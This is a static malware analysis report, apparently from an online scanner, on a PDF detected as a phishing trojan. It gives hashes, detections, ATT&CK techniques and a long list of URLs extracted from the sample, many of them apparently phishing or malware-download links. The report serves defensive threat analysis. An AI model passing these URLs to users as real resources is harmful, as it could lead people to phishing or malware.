Malicious PDF — malware analysis report

Static analysis result for SHA-256 b7d7c14ae86b4b56…

MALICIOUS

PDF

83.5 KB Created: 2021-03-15 17:12:59 +02:00 Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7)
MD5: 4eef4a2a8fca445cba83571361dc39d2 SHA-1: 7d448a314e7113a9787ec3466a9fc8add40bd197 SHA-256: b7d7c14ae86b4b56fd470baeee3ef23262ba9aae1beaeb4d05193ebb7fbfafbf
96 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.007 JavaScript

The PDF file was flagged as malicious by ML classifiers and ClamAV, indicating a high likelihood of malicious intent. The document body, though heavily obfuscated, contains a URL that appears to be a lure related to air fryers. This URL, along with other extracted URLs, likely leads to phishing content or a malware download. The presence of embedded URLs and the overall detection suggest a phishing or malware distribution campaign.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9995

Heuristics 4

  • ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://crophysi.ru/strik?utm_term=can+you+use+cooking+oil+in+an+air+fryer
    • http://nitapida.mywebcommunity.org/criminology_the_core_5th_edition.pdf
    • http://hellochildren.online/coursera_machine_learning_andrew_ng_quiz_answersc6ct2.pdf
    • http://gnatural.space/biminaoyjnk.pdf
    • http://yognat.space/41179785523obyea.pdf
    • http://naturalm.space/apologetica_evangelica1hjq3.pdf
    • https://cdn-cms.f-static.net/uploads/4386836/normal_6043b4bd28834.pdf
    • http://jewlgems.com/81981885835lgugo.pdf
    • http://kprovk.xyz/septic_tank_inspection_report_formy047q.pdf
    • http://xijulefabogi.getenjoyment.net/do_weight_watchers_scales_need_batteries.pdf
    • https://static.s123-cdn-static.com/uploads/4420230/normal_5fe3beaacab38.pdf
    • http://onkoprofi.ru/87983381117g3gbh.pdf
    • http://rusakadovub.sportsontheweb.net/genupesifunetibozukinap.pdf
    • http://usblighter24.site/how_many_calories_in_a_wendys_baconator_without_the_bun6hlz3.pdf
    • http://www.ascendercorp.com/
    • http://www.ascendercorp.com/typedesigners.html
    • http://www.daltonmaag.com/
    • https://uploads.strikinglycdn.com/files/3ba443ad-3d3b-41be-babf-f35719eafe28/what_machines_does_planet_fitness_use.pdf
    • https://uploads.strikinglycdn.com/files/2483075a-eaff-4a94-9b00-205f1310e750/12487824812.pdf
    • https://uploads.strikinglycdn.com/files/9054c636-ef03-423f-805f-4cfc4e54dac7/dasozopexikediserotojexa.pdf
    • https://6d8b2927-5c4d-40df-b593-c6bd35e19528.filesusr.com/ugd/1adac8_806c566a26014fab89914b9185d57902.pdf?index=true
    • https://c31d65df-273c-4bcc-acfb-7b03b0724b99.filesusr.com/ugd/e7e4a0_6fdb3136c2c5405e9c21e25a7b41493c.pdf?index=true
    • https://uploads.strikinglycdn.com/files/c5db1f0d-4da5-432e-9522-b931bfff4112/the_boy_in_the_striped_pajamas_movie_free.pdf
    • https://a98f38e8-5810-4fc9-be6a-c3d78c7c4f9f.filesusr.com/ugd/921909_e140344ff96d46bb9852426e119b97d1.pdf?index=true
    • https://ef733714-782c-48ea-8991-1bc0bf0c95f2.filesusr.com/ugd/ad2ade_4e9df33a4ee940759cf7d7a68ff178da.pdf?index=true
    • https://42e65457-ec34-4553-8979-78b6e302f774.filesusr.com/ugd/f1976d_7ac96f934fdc41639e5dc6d83a4a68b0.pdf?index=true
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/rights/
    • http://scripts.sil.org/OFL

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
font_00_sfnt_off0000f8d9.bin
7a4ce3a6b19ea4ee3c516534e0ed3e5bb56f1447d1d03e954c63255b50724a88		 pdf-font-stream PDF embedded font (sfnt) at offset 0xF8D9 5040 bytes
font_01_sfnt_off00010a18.bin
800b503533494bee3bd16489a0e5cb95d03099fd5d4ff500acf026f9b0efb94e		 pdf-font-stream PDF embedded font (sfnt) at offset 0x10A18 11740 bytes
font_02_sfnt_off000131aa.bin
ce7e2e230a41ba6fc2d7d2240890c8289d67876d84a3d076d67c0b48111c8230		 pdf-font-stream PDF embedded font (sfnt) at offset 0x131AA 4324 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.